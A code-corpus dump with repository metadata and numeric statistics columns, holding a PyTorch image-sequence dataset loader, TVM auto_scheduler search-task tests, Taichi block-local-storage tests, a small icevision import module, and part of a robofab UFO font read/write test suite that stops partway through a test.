| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
dba24b58ba244335f4a480bc55a2c759713de21c
| 9,435
|
py
|
Python
|
utils/dataset.py
|
THU-CVlab/MEPDNet-pytorch
|
af033785fe183a4360f3f395087b45aba377d2bc
|
[
"MIT"
] | 2
|
2021-06-13T05:58:52.000Z
|
2021-07-09T03:44:13.000Z
|
utils/dataset.py
|
THU-CVlab/MEPDNet-pytorch
|
af033785fe183a4360f3f395087b45aba377d2bc
|
[
"MIT"
] | null | null | null |
utils/dataset.py
|
THU-CVlab/MEPDNet-pytorch
|
af033785fe183a4360f3f395087b45aba377d2bc
|
[
"MIT"
] | null | null | null |
import os
import glob
import torch
import numpy as np
from PIL import Image
from os import listdir
from os.path import join,split,splitext
from utils import is_image_file
from torch.utils.data import Dataset
class SingleDataset(Dataset):
def __init__(self, img_dir, mask_dir, input_transform, target_transform, logger=None):
self.img_dir = np.load(img_dir)
self.mask_dir = mask_dir
self.img_file_names = [join('data/imgs', file_name) for file_name in self.img_dir if is_image_file(file_name)]
self.mask_file_names = [join(mask_dir, file_name.replace('\\', '/').split('/')[-1].replace('.jpg', '.npy')) for file_name in self.img_dir if is_image_file(file_name)]
if logger is not None:
logger.info(f'Finished creating an instance of {self.__class__.__name__} with {len(self.img_file_names)} examples')
else:
print(f'Finished creating an instance of {self.__class__.__name__} with {len(self.img_file_names)} examples')
self.input_transform = input_transform
self.target_transform = target_transform
def __len__(self):
return len(self.img_file_names)
def __getitem__(self,i):
img = np.array(Image.open(self.img_file_names[i]))
mask = np.load(self.mask_file_names[i])
pad = lambda img: np.stack([img,img,img],axis=2) if (len(img.shape)==2 or img.shape[2]==1) else img
img = pad(img)
img = self.input_transform(img)
mask = self.target_transform(mask)
return img, mask
class SeqDataset(Dataset):
def __init__(self, img_dir, mask_dir, input_transform, target_transform, logger=None):
self.img_dir = np.load(img_dir)
self.mask_dir = mask_dir
self.img_file_names = [join('data/imgs', file_name) for file_name in self.img_dir if is_image_file(file_name)]
self.mask_file_names = [join(mask_dir, file_name.replace('\\', '/').split('/')[-1].replace('.jpg', '.npy')) for file_name in self.img_dir if is_image_file(file_name)]
if logger is not None:
logger.info(f'Finished creating an instance of {self.__class__.__name__} with {len(self.img_file_names)} examples')
else:
print(f'Finished creating an instance of {self.__class__.__name__} with {len(self.img_file_names)} examples')
self.input_transform = input_transform
self.target_transform = target_transform
def __len__(self):
return len(self.img_file_names)
def __getitem__(self, i):
if i % 30 == 0:
imgu1 = np.array(Image.open(self.img_file_names[i]))
else:
imgu1 = np.array(Image.open(self.img_file_names[i - 1]))
img = np.array(Image.open(self.img_file_names[i]))
if i % 30 == 29:
imgd1 = np.array(Image.open(self.img_file_names[i]))
else:
imgd1 = np.array(Image.open(self.img_file_names[i + 1]))
mask = np.load(self.mask_file_names[i])
pad = lambda img: np.stack([img,img,img],axis=2) if (len(img.shape)==2 or img.shape[2]==1) else img
imgu1, img, imgd1 = pad(imgu1), pad(img), pad(imgd1)
imgu1, img, imgd1 = self.input_transform(imgu1), self.input_transform(img), self.input_transform(imgd1)
mask = self.target_transform(mask)
return imgu1, img, imgd1, mask
class SingleTestDataset(Dataset):
def __init__(self, img_dir, mask_dir, input_transform, target_transform, logger=None):
self.img_dir = np.load(img_dir)
self.mask_dir = mask_dir
self.img_file_names = [join('data/imgs', file_name) for file_name in self.img_dir if is_image_file(file_name)]
self.mask_file_names = [join(mask_dir, file_name.replace('\\', '/').split('/')[-1].replace('.jpg', '.npy')) for file_name in self.img_dir if is_image_file(file_name)]
if logger is not None:
logger.info(f'Finished creating an instance of {self.__class__.__name__} with {len(self.img_file_names)} examples')
else:
print(f'Finished creating an instance of {self.__class__.__name__} with {len(self.img_file_names)} examples')
self.input_transform = input_transform
self.target_transform = target_transform
def __len__(self):
return len(self.img_file_names)
def __getitem__(self,i):
img = np.array(Image.open(self.img_file_names[i]))
mask = np.load(self.mask_file_names[i])
pad = lambda img: np.stack([img,img,img],axis=2) if (len(img.shape)==2 or img.shape[2]==1) else img
img = pad(img)
img = self.input_transform(img)
mask = self.target_transform(mask)
return img, mask, self.img_file_names[i]
class SeqTestDataset(Dataset):
def __init__(self, img_dir, mask_dir, input_transform, target_transform, logger=None):
self.img_dir = np.load(img_dir)
self.mask_dir = mask_dir
self.img_file_names = [join('data/imgs', file_name) for file_name in self.img_dir if is_image_file(file_name)]
self.mask_file_names = [join(mask_dir, file_name.replace('\\', '/').split('/')[-1].replace('.jpg', '.npy')) for file_name in self.img_dir if is_image_file(file_name)]
if logger is not None:
logger.info(f'Finished creating an instance of {self.__class__.__name__} with {len(self.img_file_names)} examples')
else:
print(f'Finished creating an instance of {self.__class__.__name__} with {len(self.img_file_names)} examples')
self.input_transform = input_transform
self.target_transform = target_transform
def __len__(self):
return len(self.img_file_names)
def __getitem__(self,i):
if i % 30 == 0:
imgu1 = np.array(Image.open(self.img_file_names[i]))
else:
imgu1 = np.array(Image.open(self.img_file_names[i - 1]))
img = np.array(Image.open(self.img_file_names[i]))
if i % 30 == 29:
imgd1 = np.array(Image.open(self.img_file_names[i]))
else:
imgd1 = np.array(Image.open(self.img_file_names[i + 1]))
mask = np.load(self.mask_file_names[i])
pad = lambda img: np.stack([img,img,img],axis=2) if (len(img.shape)==2 or img.shape[2]==1) else img
imgu1, img, imgd1 = pad(imgu1), pad(img), pad(imgd1)
imgu1, img, imgd1 = self.input_transform(imgu1), self.input_transform(img), self.input_transform(imgd1)
mask = self.target_transform(mask)
return imgu1, img, imgd1, mask, self.img_file_names[i]
class SingleUseDataset(Dataset):
def __init__(self, img_dir, input_transform, logger=None):
self.img_dir = np.load(img_dir)
self.img_file_names = [join('data/imgs', file_name) for file_name in self.img_dir if is_image_file(file_name)]
if logger is not None:
logger.info(f'Finished creating an instance of {self.__class__.__name__} with {len(self.img_file_names)} examples')
else:
print(f'Finished creating an instance of {self.__class__.__name__} with {len(self.img_file_names)} examples')
self.input_transform = input_transform
def __len__(self):
return len(self.img_file_names)
def __getitem__(self,i):
img = np.array(Image.open(self.img_file_names[i]))
pad = lambda img: np.stack([img,img,img],axis=2) if (len(img.shape)==2 or img.shape[2]==1) else img
img = pad(img)
img = self.input_transform(img)
return img, self.img_file_names[i]
class SeqUseDataset(Dataset):
def __init__(self, img_dir, input_transform, logger=None):
self.img_dir = np.load(img_dir)
self.img_file_names = [join('data/imgs', file_name) for file_name in self.img_dir if is_image_file(file_name)]
if logger is not None:
logger.info(f'Finished creating an instance of {self.__class__.__name__} with {len(self.img_file_names)} examples')
else:
print(f'Finished creating an instance of {self.__class__.__name__} with {len(self.img_file_names)} examples')
self.input_transform = input_transform
def __len__(self):
return len(self.img_file_names)
def __getitem__(self,i):
if i % 30 == 0:
imgu1 = np.array(Image.open(self.img_file_names[i]))
else:
imgu1 = np.array(Image.open(self.img_file_names[i - 1]))
img = np.array(Image.open(self.img_file_names[i]))
if i % 30 == 29:
imgd1 = np.array(Image.open(self.img_file_names[i]))
else:
imgd1 = np.array(Image.open(self.img_file_names[i + 1]))
pad = lambda img: np.stack([img,img,img],axis=2) if (len(img.shape)==2 or img.shape[2]==1) else img
imgu1, img, imgd1 = pad(imgu1), pad(img), pad(imgd1)
imgu1, img, imgd1 = self.input_transform(imgu1), self.input_transform(img), self.input_transform(imgd1)
return imgu1, img, imgd1, self.img_file_names[i]
if __name__ == "__main__":
from transform import ToLabel
from torchvision.transforms import Compose, CenterCrop, Normalize
from torchvision.transforms import ToTensor, ToPILImage
input_transform = Compose([
ToTensor(),
])
target_transform = Compose([
ToLabel(),
])
dataset = SeqDataset('data/train.npy', 'data/masks', input_transform, target_transform)
imgu1, img, imgd1, mask = dataset.__getitem__(0)
print(imgu1.shape)
print(img.shape)
print(imgd1.shape)
print(mask.shape)
| 45.143541
| 174
| 0.662109
| 1,401
| 9,435
| 4.149179
| 0.06424
| 0.081885
| 0.087046
| 0.126613
| 0.88801
| 0.88801
| 0.880956
| 0.873387
| 0.873387
| 0.873387
| 0
| 0.013732
| 0.212719
| 9,435
| 208
| 175
| 45.360577
| 0.768848
| 0
| 0
| 0.795322
| 0
| 0.070175
| 0.140117
| 0.064865
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105263
| false
| 0
| 0.070175
| 0.035088
| 0.280702
| 0.05848
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dbba89e2dcb3ecab8c0ca99ffdcb8ebcb7da260d
| 106
|
py
|
Python
|
icevision/models/mmdet/fastai/__init__.py
|
ai-fast-track/mantisshrimp
|
cc6d6a4a048f6ddda2782b6593dcd6b083a673e4
|
[
"Apache-2.0"
] | 580
|
2020-09-10T06:29:57.000Z
|
2022-03-29T19:34:54.000Z
|
icevision/models/mmdet/fastai/__init__.py
|
ai-fast-track/mantisshrimp
|
cc6d6a4a048f6ddda2782b6593dcd6b083a673e4
|
[
"Apache-2.0"
] | 691
|
2020-09-05T03:08:34.000Z
|
2022-03-31T23:47:06.000Z
|
icevision/models/mmdet/fastai/__init__.py
|
lgvaz/mantisshrimp2
|
743cb7df0dae7eb1331fc2bb66fc9ca09db496cd
|
[
"Apache-2.0"
] | 105
|
2020-09-09T10:41:35.000Z
|
2022-03-25T17:16:49.000Z
|
from icevision.models.mmdet.fastai.callbacks import *
from icevision.models.mmdet.fastai.learner import *
| 35.333333
| 53
| 0.830189
| 14
| 106
| 6.285714
| 0.571429
| 0.295455
| 0.431818
| 0.545455
| 0.681818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075472
| 106
| 2
| 54
| 53
| 0.897959
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
9197a2097ebc25dbcdcf4f16fc61c7176f468aeb
| 8,788
|
py
|
Python
|
tests/python/unittest/test_auto_scheduler_search_task.py
|
XiaoSong9905/tvm
|
48940f697e15d5b50fa1f032003e6c700ae1e423
|
[
"Apache-2.0"
] | 4,640
|
2017-08-17T19:22:15.000Z
|
2019-11-04T15:29:46.000Z
|
tests/python/unittest/test_auto_scheduler_search_task.py
|
XiaoSong9905/tvm
|
48940f697e15d5b50fa1f032003e6c700ae1e423
|
[
"Apache-2.0"
] | 3,022
|
2020-11-24T14:02:31.000Z
|
2022-03-31T23:55:31.000Z
|
tests/python/unittest/test_auto_scheduler_search_task.py
|
XiaoSong9905/tvm
|
48940f697e15d5b50fa1f032003e6c700ae1e423
|
[
"Apache-2.0"
] | 1,352
|
2017-08-17T19:30:38.000Z
|
2019-11-04T16:09:29.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Test search policy"""
import numpy as np
import tempfile
import tvm
import tvm.testing
from tvm import auto_scheduler
from tvm.auto_scheduler.utils import get_const_tuple
from tvm.testing.auto_scheduler import (
matmul_auto_scheduler_test,
zero_rank_compute_auto_scheduler_test,
zero_rank_reduce_auto_scheduler_test,
)
def test_search_task_add_task_input():
auto_scheduler.search_task.TASK_INPUT_BUFFER_TABLE.clear()
N = 64
target = "llvm"
test_input_0 = tvm.runtime.ndarray.empty((64, 64))
test_input_1 = tvm.runtime.ndarray.empty((10, 20))
test_input_2 = tvm.runtime.ndarray.empty((30, 40, 50))
task = auto_scheduler.SearchTask(
func="matmul_auto_scheduler_test",
args=(N, N, N),
target=target,
task_inputs={
"test_input_0": test_input_0,
"test_input_1": test_input_1,
"test_input_2": test_input_2,
},
task_inputs_overwrite=True,
)
assert len(task.task_input_names) == 3
assert task.task_input_names[0] == "test_input_0"
assert task.task_input_names[1] == "test_input_1"
assert task.task_input_names[2] == "test_input_2"
def test_search_task_record():
auto_scheduler.search_task.TASK_INPUT_BUFFER_TABLE.clear()
N = 64
target = "llvm"
# Log with no task input
task = auto_scheduler.SearchTask(
func="matmul_auto_scheduler_test", args=(N, N, N), target=target
)
task_record = auto_scheduler._ffi_api.SerializeSearchTask(task)
new_task = auto_scheduler._ffi_api.DeserializeSearchTask(task_record)
# TODO(jcf94): Check the compute dag & hardware parameter
assert task.workload_key == new_task.workload_key
assert str(task.target) == str(new_task.target)
assert str(task.target.host) == str(new_task.target.host)
assert task.layout_rewrite_option == new_task.layout_rewrite_option
# Log with 1 task input
test_input_0 = tvm.runtime.ndarray.empty((64, 64))
task = auto_scheduler.SearchTask(
func="matmul_auto_scheduler_test",
args=(N, N, N),
target=target,
task_inputs={"test_input_0": test_input_0},
task_inputs_overwrite=True,
)
task_record = auto_scheduler._ffi_api.SerializeSearchTask(task)
new_task = auto_scheduler._ffi_api.DeserializeSearchTask(task_record)
assert task.workload_key == new_task.workload_key
assert str(task.target) == str(new_task.target)
assert str(task.target.host) == str(new_task.target.host)
assert task.layout_rewrite_option == new_task.layout_rewrite_option
assert len(new_task.task_input_names) == 1
assert new_task.task_input_names[0] == "test_input_0"
# Log with multiple task inputs
test_input_1 = tvm.runtime.ndarray.empty((64, 64))
task = auto_scheduler.SearchTask(
func="matmul_auto_scheduler_test",
args=(N, N, N),
target=target,
task_inputs={
"test_input_0": test_input_0,
"test_input_1": test_input_1,
},
task_inputs_overwrite=True,
)
task_record = auto_scheduler._ffi_api.SerializeSearchTask(task)
new_task = auto_scheduler._ffi_api.DeserializeSearchTask(task_record)
assert task.workload_key == new_task.workload_key
assert str(task.target) == str(new_task.target)
assert str(task.target.host) == str(new_task.target.host)
assert task.layout_rewrite_option == new_task.layout_rewrite_option
assert len(new_task.task_input_names) == 2
assert new_task.task_input_names[0] == "test_input_0"
assert new_task.task_input_names[1] == "test_input_1"
# Log with version 0.5
v5_log = """["[\\\"matmul_auto_scheduler_test\\\", 64, 64, 64]", "llvm -keys=cpu", [6, 64, 64, 0, 0, 0, 0, 0], "", 1]"""
new_task = auto_scheduler._ffi_api.DeserializeSearchTask(v5_log)
assert task.workload_key == new_task.workload_key
assert str(task.target) == str(new_task.target)
assert str(task.target.host) == str(new_task.target.host)
assert task.layout_rewrite_option == new_task.layout_rewrite_option
assert len(new_task.task_input_names) == 0
def test_recover_measure_input_with_task_input():
auto_scheduler.search_task.TASK_INPUT_BUFFER_TABLE.clear()
# Since this file is tests for search_task, we only check the search_task here
# Log with no task input
task = auto_scheduler.SearchTask(
func=matmul_auto_scheduler_test, args=(512, 512, 512), target="llvm"
)
inp = auto_scheduler.measure.MeasureInput(task, task.compute_dag.init_state)
res = auto_scheduler.measure.MeasureResult([0.1], 0, "", 0.2, 1)
measure_record = auto_scheduler.measure_record.dump_record_to_string(inp, res)
measure_log = auto_scheduler.measure_record.load_record_from_string(measure_record)
new_task = measure_log[0].task
assert task.workload_key == new_task.workload_key
assert str(task.target) == str(new_task.target)
assert str(task.target.host) == str(new_task.target.host)
assert task.layout_rewrite_option == new_task.layout_rewrite_option
# Log with 1 task input
test_input_0 = tvm.runtime.ndarray.empty((64, 64))
task = auto_scheduler.SearchTask(
func=matmul_auto_scheduler_test,
args=(512, 512, 512),
target="llvm",
task_inputs={
"test_input_0": test_input_0,
},
task_inputs_overwrite=True,
)
inp = auto_scheduler.measure.MeasureInput(task, task.compute_dag.init_state)
res = auto_scheduler.measure.MeasureResult([0.1], 0, "", 0.2, 1)
measure_record = auto_scheduler.measure_record.dump_record_to_string(inp, res)
measure_log = auto_scheduler.measure_record.load_record_from_string(measure_record)
new_task = measure_log[0].task
assert task.workload_key == new_task.workload_key
assert str(task.target) == str(new_task.target)
assert str(task.target.host) == str(new_task.target.host)
assert task.layout_rewrite_option == new_task.layout_rewrite_option
assert len(new_task.task_input_names) == 1
assert new_task.task_input_names[0] == "test_input_0"
# Log with multiple task inputs
test_input_1 = tvm.runtime.ndarray.empty((64, 64))
task = auto_scheduler.SearchTask(
func=matmul_auto_scheduler_test,
args=(512, 512, 512),
target="llvm",
task_inputs={
"test_input_0": test_input_0,
"test_input_1": test_input_1,
},
task_inputs_overwrite=True,
)
inp = auto_scheduler.measure.MeasureInput(task, task.compute_dag.init_state)
res = auto_scheduler.measure.MeasureResult([0.1], 0, "", 0.2, 1)
measure_record = auto_scheduler.measure_record.dump_record_to_string(inp, res)
measure_log = auto_scheduler.measure_record.load_record_from_string(measure_record)
new_task = measure_log[0].task
assert task.workload_key == new_task.workload_key
assert str(task.target) == str(new_task.target)
assert str(task.target.host) == str(new_task.target.host)
assert task.layout_rewrite_option == new_task.layout_rewrite_option
assert len(new_task.task_input_names) == 2
assert new_task.task_input_names[0] == "test_input_0"
assert new_task.task_input_names[1] == "test_input_1"
# Log with version 0.5
v5_log = """{"i": [["[\\\"matmul_auto_scheduler_test\\\", 512, 512, 512]", "llvm -keys=cpu", [6, 64, 64, 0, 0, 0, 0, 0], "", 1], [[], []]], "r": [[0.1], 0, 0.2, 1], "v": "v0.6"}"""
measure_log = auto_scheduler.measure_record.load_record_from_string(v5_log)
new_task = measure_log[0].task
assert task.workload_key == new_task.workload_key
assert str(task.target) == str(new_task.target)
assert str(task.target.host) == str(new_task.target.host)
assert task.layout_rewrite_option == new_task.layout_rewrite_option
assert len(new_task.task_input_names) == 0
if __name__ == "__main__":
test_search_task_add_task_input()
test_search_task_record()
test_recover_measure_input_with_task_input()
| 42.25
| 184
| 0.716431
| 1,278
| 8,788
| 4.604069
| 0.13615
| 0.061863
| 0.041978
| 0.048946
| 0.800986
| 0.78569
| 0.777362
| 0.753229
| 0.7483
| 0.736234
| 0
| 0.026796
| 0.176149
| 8,788
| 207
| 185
| 42.454106
| 0.785912
| 0.124829
| 0
| 0.72956
| 0
| 0.012579
| 0.080679
| 0.023629
| 0
| 0
| 0
| 0.004831
| 0.301887
| 1
| 0.018868
| false
| 0
| 0.044025
| 0
| 0.062893
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
919c6a65fed478261d02cf231b0e54aa32771f41
| 1,344
|
py
|
Python
|
tests/python/test_bls_assume_in_range.py
|
kxxt/taichi
|
15f39b79c258080f1e34fcbdc29646d9ced0a4fe
|
[
"MIT"
] | 11,699
|
2020-01-09T03:02:46.000Z
|
2022-03-31T20:59:08.000Z
|
tests/python/test_bls_assume_in_range.py
|
kxxt/taichi
|
15f39b79c258080f1e34fcbdc29646d9ced0a4fe
|
[
"MIT"
] | 3,589
|
2020-01-09T03:18:25.000Z
|
2022-03-31T19:06:42.000Z
|
tests/python/test_bls_assume_in_range.py
|
kxxt/taichi
|
15f39b79c258080f1e34fcbdc29646d9ced0a4fe
|
[
"MIT"
] | 1,391
|
2020-01-09T03:02:54.000Z
|
2022-03-31T08:44:29.000Z
|
import taichi as ti
from .bls_test_template import bls_particle_grid
@ti.test(require=ti.extension.bls)
def test_scattering():
bls_particle_grid(N=128,
ppc=10,
block_size=8,
scatter=True,
use_offset=False)
@ti.test(require=ti.extension.bls)
def test_scattering_offset():
bls_particle_grid(N=128,
ppc=10,
block_size=8,
scatter=True,
use_offset=True)
@ti.test(require=ti.extension.bls)
def test_scattering_two_pointer_levels():
bls_particle_grid(N=128,
ppc=10,
block_size=8,
scatter=True,
pointer_level=2,
use_offset=False)
@ti.test(require=ti.extension.bls)
def test_gathering():
bls_particle_grid(N=128,
ppc=10,
block_size=8,
scatter=False,
use_offset=False)
@ti.test(require=ti.extension.bls)
def test_gathering_offset():
bls_particle_grid(N=128,
ppc=10,
block_size=8,
scatter=False,
use_offset=True)
# TODO: debug mode behavior of assume_in_range
| 25.358491
| 48
| 0.508185
| 148
| 1,344
| 4.364865
| 0.27027
| 0.102167
| 0.139319
| 0.116099
| 0.80031
| 0.80031
| 0.80031
| 0.80031
| 0.80031
| 0.648607
| 0
| 0.039092
| 0.40997
| 1,344
| 52
| 49
| 25.846154
| 0.775536
| 0.032738
| 0
| 0.789474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019231
| 0
| 1
| 0.131579
| true
| 0
| 0.052632
| 0
| 0.184211
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
91c072d2620e318568a27f670f23a1ad8e77b262
| 20,218
|
py
|
Python
|
Lib/robofab/test/test_fontLabUFOReadWrite.py
|
Vectro-Type-Foundry/robofab
|
cd65d78292d24358c98dce53d283314cdc85878e
|
[
"BSD-3-Clause"
] | 61
|
2015-01-17T10:15:45.000Z
|
2018-12-02T13:53:02.000Z
|
Lib/robofab/test/test_fontLabUFOReadWrite.py
|
Vectro-Type-Foundry/robofab
|
cd65d78292d24358c98dce53d283314cdc85878e
|
[
"BSD-3-Clause"
] | 37
|
2015-01-05T23:44:56.000Z
|
2018-03-16T19:05:28.000Z
|
Lib/robofab/test/test_fontLabUFOReadWrite.py
|
Vectro-Type-Foundry/robofab
|
cd65d78292d24358c98dce53d283314cdc85878e
|
[
"BSD-3-Clause"
] | 25
|
2015-01-08T19:49:36.000Z
|
2018-10-29T00:36:46.000Z
|
import os
import shutil
import unittest
import tempfile
from robofab.plistlib import readPlist
import robofab
from robofab.ufoLib import UFOReader, UFOWriter
from robofab.test.testSupport import fontInfoVersion2, expectedFontInfo1To2Conversion
from robofab.objects.objectsFL import NewFont, OpenFont
vfbPath = os.path.dirname(robofab.__file__)
vfbPath = os.path.dirname(vfbPath)
vfbPath = os.path.dirname(vfbPath)
vfbPath = os.path.join(vfbPath, "TestData", "TestFont1.vfb")
ufoPath1 = os.path.dirname(robofab.__file__)
ufoPath1 = os.path.dirname(ufoPath1)
ufoPath1 = os.path.dirname(ufoPath1)
ufoPath1 = os.path.join(ufoPath1, "TestData", "TestFont1 (UFO1).ufo")
ufoPath2 = ufoPath1.replace("TestFont1 (UFO1).ufo", "TestFont1 (UFO2).ufo")
expectedFormatVersion1Features = """@myClass = [A B];
feature liga {
sub A A by b;
} liga;
"""
# robofab should remove these from the lib after a load.
removeFromFormatVersion1Lib = [
"org.robofab.opentype.classes",
"org.robofab.opentype.features",
"org.robofab.opentype.featureorder",
"org.robofab.postScriptHintData"
]
class ReadUFOFormatVersion1TestCase(unittest.TestCase):
def setUpFont(self, doInfo=False, doKerning=False, doGroups=False, doLib=False, doFeatures=False):
self.font = NewFont()
self.ufoPath = ufoPath1
self.font.readUFO(ufoPath1, doInfo=doInfo, doKerning=doKerning, doGroups=doGroups, doLib=doLib, doFeatures=doFeatures)
self.font.update()
def tearDownFont(self):
self.font.close()
self.font = None
def compareToUFO(self, doInfo=True, doKerning=True, doGroups=True, doLib=True, doFeatures=True):
reader = UFOReader(self.ufoPath)
results = {}
if doInfo:
infoMatches = True
info = self.font.info
for attr, expectedValue in expectedFontInfo1To2Conversion.items():
writtenValue = getattr(info, attr)
if expectedValue != writtenValue:
infoMatches = False
break
results["info"]= infoMatches
if doKerning:
kerning = self.font.kerning.asDict()
expectedKerning = reader.readKerning()
results["kerning"] = expectedKerning == kerning
if doGroups:
groups = dict(self.font.groups)
expectedGroups = reader.readGroups()
results["groups"] = expectedGroups == groups
if doFeatures:
features = self.font.features.text
expectedFeatures = expectedFormatVersion1Features
# FontLab likes to add lines to the features, so skip blank lines.
features = [line for line in features.splitlines() if line]
expectedFeatures = [line for line in expectedFeatures.splitlines() if line]
results["features"] = expectedFeatures == features
if doLib:
lib = dict(self.font.lib)
expectedLib = reader.readLib()
for key in removeFromFormatVersion1Lib:
if key in expectedLib:
del expectedLib[key]
results["lib"] = expectedLib == lib
return results
def testFull(self):
self.setUpFont(doInfo=True, doKerning=True, doGroups=True, doFeatures=True, doLib=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], True)
self.assertEqual(otherResults["kerning"], True)
self.assertEqual(otherResults["groups"], True)
self.assertEqual(otherResults["features"], True)
self.assertEqual(otherResults["lib"], True)
self.tearDownFont()
def testInfo(self):
self.setUpFont(doInfo=True)
otherResults = self.compareToUFO(doInfo=False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], False)
self.assertEqual(otherResults["features"], False)
self.assertEqual(otherResults["lib"], False)
info = self.font.info
for attr, expectedValue in expectedFontInfo1To2Conversion.items():
writtenValue = getattr(info, attr)
self.assertEqual((attr, expectedValue), (attr, writtenValue))
self.tearDownFont()
def testFeatures(self):
self.setUpFont(doFeatures=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], False)
self.assertEqual(otherResults["features"], True)
self.assertEqual(otherResults["lib"], False)
self.tearDownFont()
def testKerning(self):
self.setUpFont(doKerning=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], True)
self.assertEqual(otherResults["groups"], False)
self.assertEqual(otherResults["features"], False)
self.assertEqual(otherResults["lib"], False)
self.tearDownFont()
def testGroups(self):
self.setUpFont(doGroups=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], True)
self.assertEqual(otherResults["features"], False)
self.assertEqual(otherResults["lib"], False)
self.tearDownFont()
def testLib(self):
self.setUpFont(doLib=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], False)
self.assertEqual(otherResults["features"], False)
self.assertEqual(otherResults["lib"], True)
self.tearDownFont()
class ReadUFOFormatVersion2TestCase(unittest.TestCase):
def setUpFont(self, doInfo=False, doKerning=False, doGroups=False, doLib=False, doFeatures=False):
self.font = NewFont()
self.ufoPath = ufoPath2
self.font.readUFO(ufoPath2, doInfo=doInfo, doKerning=doKerning, doGroups=doGroups, doLib=doLib, doFeatures=doFeatures)
self.font.update()
def tearDownFont(self):
self.font.close()
self.font = None
def compareToUFO(self, doInfo=True, doKerning=True, doGroups=True, doLib=True, doFeatures=True):
reader = UFOReader(self.ufoPath)
results = {}
if doInfo:
infoMatches = True
info = self.font.info
for attr, expectedValue in fontInfoVersion2.items():
# cheat by skipping attrs that aren't supported
if info._ufoToFLAttrMapping[attr]["nakedAttribute"] is None:
continue
writtenValue = getattr(info, attr)
if expectedValue != writtenValue:
infoMatches = False
break
results["info"]= infoMatches
if doKerning:
kerning = self.font.kerning.asDict()
expectedKerning = reader.readKerning()
results["kerning"] = expectedKerning == kerning
if doGroups:
groups = dict(self.font.groups)
expectedGroups = reader.readGroups()
results["groups"] = expectedGroups == groups
if doFeatures:
features = self.font.features.text
expectedFeatures = reader.readFeatures()
results["features"] = expectedFeatures == features
if doLib:
lib = dict(self.font.lib)
expectedLib = reader.readLib()
results["lib"] = expectedLib == lib
return results
def testFull(self):
self.setUpFont(doInfo=True, doKerning=True, doGroups=True, doFeatures=True, doLib=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], True)
self.assertEqual(otherResults["kerning"], True)
self.assertEqual(otherResults["groups"], True)
self.assertEqual(otherResults["features"], True)
self.assertEqual(otherResults["lib"], True)
self.tearDownFont()
def testInfo(self):
self.setUpFont(doInfo=True)
otherResults = self.compareToUFO(doInfo=False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], False)
self.assertEqual(otherResults["features"], False)
self.assertEqual(otherResults["lib"], False)
info = self.font.info
for attr, expectedValue in fontInfoVersion2.items():
# cheat by skipping attrs that aren't supported
if info._ufoToFLAttrMapping[attr]["nakedAttribute"] is None:
continue
writtenValue = getattr(info, attr)
self.assertEqual((attr, expectedValue), (attr, writtenValue))
self.tearDownFont()
def testFeatures(self):
self.setUpFont(doFeatures=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], False)
self.assertEqual(otherResults["groups"], False)
self.assertEqual(otherResults["features"], True)
self.assertEqual(otherResults["lib"], False)
self.tearDownFont()
def testKerning(self):
self.setUpFont(doKerning=True)
otherResults = self.compareToUFO()
self.assertEqual(otherResults["info"], False)
self.assertEqual(otherResults["kerning"], True)
